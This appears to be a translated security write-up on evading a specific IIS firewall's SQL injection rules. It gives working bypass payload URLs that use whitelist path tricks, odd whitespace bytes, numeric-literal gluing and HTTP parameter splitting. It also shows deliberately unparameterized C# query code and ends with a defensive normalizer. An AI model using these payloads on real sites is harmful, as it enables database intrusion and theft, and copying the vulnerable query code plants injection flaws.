Bypass D Shield _ Firewall (legacy and new version) SQL injection Defense (multi posture)

Source: Internet
Author: User
Tags: mssql, sql injection, sql injection defense

D Shield old version:

00 Preface

D Shield _iis Firewall currently only supports Windows Server 2003. The official blog recently said that a new version of D Shield will be released soon, and its features will presumably be more powerful, so this post shares the results of the earlier SQL injection defense tests. The injection defense strategy of the D Shield _iis firewall consists mainly of: primary detection on GET/POST/cookie, and a file whitelist setting.

Different test environments were built: IIS + (ASP/ASPX/PHP) + (MSSQL/MySQL). Given the strategy above, the main test ideas were:

A. the whitelist

B. bypassing the detection of "union select" or "select from"

PHP + IIS + MySQL

Building the Windows 2003 + IIS + PHP + MySQL environment took quite a lot of time, but the testing itself went smoothly. First, the baseline: an ordinary injection request is blocked.

Bypass Posture I: whitelist

PHP's PATH_INFO behaviour, simply put, means that

http://x.x.x.x/1.php?id=1 is equivalent to

http://x.x.x.x/1.php/xxxxxxxxxxxxx?id=1

because everything after the script name is passed to 1.php as path info. So a file name from the whitelist can be appended after the real script, and the request bypasses detection:

http://x.x.x.x/1.php/admin.php?id=1 union select 1,2,schema_name from information_schema.schemata

After testing, GET, POST and cookie parameters are all affected: this is a complete bypass.

Bypass Posture II: whitespace characters

The whitespace characters that MySQL accepts between keywords are: %09, %0a, %0b, %0c, %0d, %20, %a0.

In testing, the range [0x01-0x20] is handled for MSSQL, but MySQL additionally accepts %a0. When %a0 is joined directly to "select", the keyword is not recognized, and the filter is bypassed:

Http://x.x.x.x/1.php?id=1 Union%a0select, from admin

Bypass Posture III: \n form

The main question is how to bypass the "union select" and "select from" rules.

The previous posture explored the position between "union" and "select"; can the position in front of "union" be tested in the same way?

Testing showed that placing \n between the parameter value and "union" bypasses the "union select" detection, and the same trick bypasses the "select from" detection:

http://x.x.x.x/1.php?id=\nunion (select 1,schema_name,\nfrom information_schema.schemata)

IIS + ASP/ASPX + MSSQL

Build an IIS + ASP/ASPX + MSSQL environment. The approach is the same, but the language and database characteristics differ slightly, so the fight with D Shield continues:

Bypass Posture I: whitelist

ASP: not applicable. The server returns "path not found", and D Shield forbids executing scripts whose path contains illegal characters or special directories (such as /1.asp/x).

http://x.x.x.x/admin.php/../1.asp?id=1 and 1=1 is intercepted; /1.asp?b=admin.php&id=1 and 1=1 is intercepted too. Evidently D Shield resolves the actual location of the executed file rather than simply checking whether the URL contains a whitelisted name...

ASPX: similar to PHP. http://x.x.x.x/1.aspx/admin.php?id=1 union select 1,'2',table_name from INFORMATION_SCHEMA.TABLES bypasses successfully.

Bypass Posture II: whitespace characters

The whitespace characters MSSQL accepts are 01,02,03,04,05,06,07,08,09,0a,0b,0c,0d,0e,0f,10,11,12,13,14,15,16,17,18,19,1a,1b,1c,1d,1e,1f, i.e. [0x01-0x20], and all of them are handled by the firewall. Could the MySQL %a0 trick be reused here?

ASP + MSSQL: %a0 is not accepted by the parser, so this was abandoned...

ASPX + MSSQL: %a0 combined with %0a successfully bypasses the "union select" detection: id=1 union%a0%0aselect 1,'2',table_name%a0from INFORMATION_SCHEMA.TABLES

Bypass Posture III: 1e (scientific notation) form

MSSQL is strongly typed, so this bypass is limited: the value immediately before the keyword must be numeric, which lets "1efrom" bypass the "select from" rule. This depends only on the database, not on the language, so both ASP and ASPX can bypass with: id=1eunion select '1',table_name,1efrom information_schema.TABLES

D Shield new version:

00 Preface:

"D Shield _ Firewall" is active-defense protection software designed for IIS, combining internal and external protection to prevent website and server intrusion. The new version supports Win2003/Win2008/Win2012/Win2016, and its overall protection on IIS is very strong. This article uses a single SQL injection point to share a way of thinking about bypassing D Shield _ Firewall's SQL injection defense.

01 Environment Construction:

Construct an ASPX + MSSQL injection point (deliberately vulnerable test code; the id value is concatenated into the query without parameterization):

string id = Request.Params["id"]; // ASP.NET Request.Params merges query string, form and cookie values

string sql = string.Format("select * from admin where id={0}", id); // id is spliced straight into the SQL text

"D Shield _ Firewall" version: v2.0.6.70

02 Special MSSQL Features:

One, MSSQL characteristics

In MSSQL, the position between the parameter value and "union" can be filled in several common ways:

(1) Whitespace characters. The whitespace characters MSSQL accepts are:

01,02,03,04,05,06,07,08,09,0a,0b,0c,0d,0e,0f,10,11,12,13,14,15,16,17,18,19,1a,1b,1c,1d,1e,1f,20

(2) Comment symbol

MSSQL also accepts the inline comment /**/ as a separator.

(3) Floating-point number

SELECT * FROM admin where id=1.1union select 1,'2',db_name() from admin

(4) The 1E0 form:

SELECT * FROM admin where id=1e0union select 1,'2',db_name() from admin

Two, Bypass Fuzz

Testing with these conventional forms did not work, so for the constructed injection point, the position between the parameter value and "union" was fuzzed:

http://x.x.x.x/sql.aspx?id=1[fuzz position]union select null,null,system_user

Fuzz result: the "union select" defense can be bypassed with the special numeric form 1.e.

This takes care of the "union select" part of the bypass; the next question is how to bypass the "select from" defense rule.

03 Split injection via the ASPX feature

One, ASPX HPP feature

If GET, POST and cookie all submit a parameter named id, in what order does the server side receive them?

ASPX + IIS: when the id parameter is submitted in more than one place, all values are received and joined with commas, such as:

Two, Bypass test

The way ASPX + IIS receives same-named parameters from several sources at once is quite special, and it can be put to use: the "select from" can be split across those sources, which bypasses D Shield's SQL injection defense rules.

04 Summary:

Partial bypass: the special numeric form 1.e applies to MSSQL scenarios.

Limitations of the complete bypass posture:

It relies on Request.Params["id"] to read the parameter, which concatenates the values from three sources: (1) GET (2) POST (3) cookie.

The applicable scenario is therefore somewhat limited; it is shared only as a way of thinking about bypasses.

In addition, if the three keywords union, select and from are each placed in the GET/POST/cookie positions and recombined by this ASPX feature, I believe many WAFs cannot defend against it.
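As an added, defender-side example (not code from the original post and not D Shield's implementation): a canonicalizer that applies the observations from both halves of the article, the MSSQL/MySQL separator bytes, the /**/ comment, numeric literals glued to keywords (1e, 1e0, 1.1, 1.e), PATH_INFO whitelist confusion, and the comma-join of same-named GET/POST/cookie values described in the ASPX section, before running the "union select" / "select from" rules. The rule set, script_path and merged_param helpers are my assumptions about how a WAF should handle these cases.

```python
import re
from urllib.parse import unquote_to_bytes, urlsplit

# Separator bytes the page lists: MSSQL accepts [0x01-0x20], MySQL additionally 0xa0.
SEPARATORS = bytes(range(0x01, 0x21)) + b"\xa0"
_TO_SPACE = bytes.maketrans(SEPARATORS, b" " * len(SEPARATORS))
# Numeric literal glued to a keyword with no separator: 1eunion, 1.1union, 1e0union, 1.eunion
NUM_GLUE = re.compile(r"(\d+\.?\d*e?\d*)(?=[a-z])")
RULES = [re.compile(r"\bunion\s+select\b"), re.compile(r"\bselect\b.+\bfrom\b")]
SCRIPT_EXT = (".php", ".asp", ".aspx")

def normalize(raw: str) -> str:
    """Canonicalize one parameter value before matching keyword rules."""
    data = unquote_to_bytes(raw).translate(_TO_SPACE)   # %a0 / %0a / %09 ... -> ' '
    text = data.decode("latin-1").lower()
    text = re.sub(r"/\*.*?\*/", " ", text)                # /**/ acts as whitespace
    text = NUM_GLUE.sub(r"\1 ", text)                     # "1eunion" -> "1e union"
    return re.sub(r"\s+", " ", text).strip()

def is_injection(value: str) -> bool:
    norm = normalize(value)
    return any(rule.search(norm) for rule in RULES)

def script_path(url: str) -> str:
    """Path up to the first script segment, i.e. the file that actually executes; anything
    after it is PATH_INFO, so '/1.php/admin.php' must not satisfy a whitelist entry for admin.php."""
    path = urlsplit(url).path
    parts = path.split("/")
    for i, seg in enumerate(parts):
        if seg.lower().endswith(SCRIPT_EXT):
            return "/".join(parts[: i + 1])
    return path

def merged_param(name: str, *sources: dict) -> str:
    """Mimic what the page describes for ASP.NET Request.Params: same-named values from
    query string, form and cookies are joined with commas, so rules must run on the joined
    string (assumed behaviour, not a reimplementation of ASP.NET)."""
    return ",".join(s[name] for s in sources if name in s)

def should_block(url: str, whitelist: set, post=None, cookies=None) -> bool:
    if script_path(url) in whitelist:        # whitelist keyed on the executing script only
        return False
    query = dict(p.split("=", 1) for p in urlsplit(url).query.split("&") if "=" in p)
    return any(is_injection(merged_param(k, query, post or {}, cookies or {})) for k in query)
```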
